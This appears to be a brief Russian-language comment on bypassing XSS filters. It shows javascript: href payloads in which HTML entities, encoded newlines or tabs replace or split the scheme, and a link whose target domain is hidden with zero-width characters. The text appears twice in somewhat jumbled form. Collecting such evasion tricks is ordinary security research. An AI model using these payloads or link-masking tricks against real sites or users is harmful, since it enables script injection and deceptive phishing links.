В дополнение к статье.
Вместо двоеточия может быть:
В середине
Ну и %0a %0d %09 (знак табуляции) естественно, причем последний можно вовсе сократить до 	
https://jsfiddle.net/423zcpL0/
Используя html entities подобмным образом можно скрыть ссылку на домен:
https://jsfiddle.net/423zcpL0/1/
Ссылка ведет на google.com ¯\_(ツ)_/¯
Таблица с html entities для игр:
https://dev.w3.org/html5/html-author/charref
<a href="javascript{entity}alert(1)">clickme</a>Вместо двоеточия может быть:
: : : (ну и вариации двух последних)В середине
<a href="ja{entity}vas{entity}cript:alert(1)">clickme</a>	




Ну и %0a %0d %09 (знак табуляции) естественно, причем последний можно вовсе сократить до 	
https://jsfiddle.net/423zcpL0/
Используя html entities подобмным образом можно скрыть ссылку на домен:
<a href="//\/@g⁠o​o‌g‍l­e
.	com">clickme</a>
https://jsfiddle.net/423zcpL0/1/
Ссылка ведет на google.com ¯\_(ツ)_/¯
Таблица с html entities для игр:
https://dev.w3.org/html5/html-author/charref